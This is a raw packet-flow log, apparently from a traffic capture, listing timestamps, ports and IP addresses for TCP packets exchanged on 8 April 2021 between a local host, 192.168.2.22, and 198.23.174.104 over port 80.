Apr 8, 2021 12:50:32.904441118 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904443979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904478073 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904479980 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904512882 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904535055 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904537916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904550076 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904561043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904578924 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904592037 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.906405926 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.906810999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.906872034 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.906929016 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.906941891 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907005072 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907028913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907046080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907063961 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907080889 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907088041 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907105923 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907111883 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907123089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907149076 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907166958 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907177925 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907196045 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907216072 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907232046 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907238007 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907254934 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907321930 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907341003 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907382965 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907383919 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907423019 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907438993 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907468081 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907476902 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907490015 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907506943 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907594919 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907620907 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907648087 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907669067 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907674074 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907696962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907721043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907740116 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907744884 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907762051 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907776117 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907793999 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907799006 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907816887 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907825947 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907844067 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907855988 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907875061 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907906055 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.907923937 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.907991886 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908010960 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908025026 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908045053 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908061981 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908080101 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908082962 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908083916 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908128023 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908133030 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908334970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908359051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908384085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908401966 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908406019 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908423901 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908442974 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908446074 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908467054 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908499002 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908518076 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908531904 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908541918 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908556938 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.908579111 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.908637047 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.911768913 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913207054 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913245916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913269997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913275003 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913295031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913394928 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913414955 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913434982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913458109 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913463116 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913491964 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913516998 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913539886 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913552999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913583040 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913597107 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913615942 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913625956 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913655996 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913662910 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913691044 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913716078 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913763046 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913769007 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913795948 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913820982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913860083 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913866043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913866997 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913923979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.913969994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.913994074 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914072037 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914072990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914098024 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914134026 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914149046 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914223909 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914262056 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914263964 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914302111 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914303064 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914329052 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914340973 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914367914 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914403915 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914439917 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914443970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914477110 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914480925 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914513111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914530993 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914550066 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914582968 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914604902 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914614916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914632082 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914661884 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914664984 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914700031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914732933 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914755106 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914761066 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914786100 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914791107 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914810896 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914819002 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914838076 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.914841890 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.914864063 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915292025 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915338993 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915365934 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915390968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915496111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915515900 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915522099 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915544987 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915572882 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915592909 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915736914 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915756941 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.915761948 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.915796041 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.916620970 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.916644096 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.919589996 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.020908117 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.020952940 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.020973921 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.020975113 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.020992994 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021001101 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021012068 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021024942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021045923 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021059036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021064043 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021095991 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021106958 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021130085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021131039 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021164894 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021184921 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021208048 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021282911 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021289110 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021311998 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021336079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021375895 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021380901 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021413088 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021452904 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021464109 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021502972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021539927 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021574020 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021606922 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021631956 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021646023 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021662951 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021675110 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021698952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021709919 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021742105 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021748066 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021780014 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021780968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021812916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021816015 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021851063 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021852970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021888018 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021892071 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021922112 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021933079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021958113 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021969080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.021981955 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.021998882 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.022007942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.022017002 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.022042036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.022073030 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.022097111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.022110939 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.022119999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.022156954 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.022164106 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023080111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023129940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023142099 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023175001 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023195028 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023231983 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023273945 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023300886 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023314953 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023344040 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023427963 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023463011 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023468018 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023495913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023498058 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023535013 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023585081 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023617029 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023629904 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023653030 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023663044 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023695946 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023700953 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023732901 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023848057 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023874044 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023899078 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023930073 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023936033 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.023957014 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.023988008 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024046898 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024056911 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024061918 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024101019 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024106979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024125099 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024142981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024146080 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024158001 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024180889 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024190903 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024208069 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024219036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024233103 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024244070 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024256945 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024287939 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024308920 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024312019 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024313927 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024323940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024367094 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024368048 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024410009 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024452925 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024458885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024492979 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024532080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024538994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024611950 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024641991 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024661064 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024683952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024688959 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024698019 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024709940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024720907 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024744034 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024753094 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024756908 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024780035 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024806023 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024833918 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024847031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024869919 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024873972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024893999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024912119 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024918079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024930000 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024964094 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.024969101 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.024987936 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025003910 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025019884 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025029898 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025046110 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025059938 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025089025 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025093079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025130033 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.025168896 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.025192976 CEST	80	49167	198.23.174.104	192.168.2.22
